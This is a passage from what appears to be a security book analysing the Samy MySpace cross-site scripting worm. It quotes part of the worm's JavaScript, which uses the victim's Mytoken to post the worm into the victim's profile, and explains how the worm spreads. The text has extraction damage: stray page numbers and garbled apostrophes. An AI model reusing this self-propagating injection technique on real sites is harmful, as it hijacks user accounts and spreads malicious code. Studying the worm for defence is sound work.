After previewing:
// - grab the "hash" token from the preview page (required to perform
60
// the final submission)
// - run postHero() to finally submit the final submit to add the
// worm to the victim.
httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken=' +
myToken, postHero, 'POST',
parameterArrayToParameterString(queryParameterArray));
}
}
}
Note that the function above first checks whether the victim has already been victimized.
If not, it grab??™s the victim??™s Mytoken, and begins the first step (of two) to add Samy to the
victim??™s Heros section, and it injects the script injection and attack code into the victim??™s
profile page, too. It does so by performing the profile.previewInterests action on
MySpace with the worm code, appropriate friendID, and appropriate Mytoken. The
next step runs postHero(), which grabs a necessary hash token and submits the final
request to add Samy as the victim??™s hero and add the script injection and attack code to the
victim??™s profile page.
// postHero() grabs the "hash" from the victims's interest preview page.
// performs the final submission to add "samy" (and the worm) to the
// victim's profile page.
Pages:
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148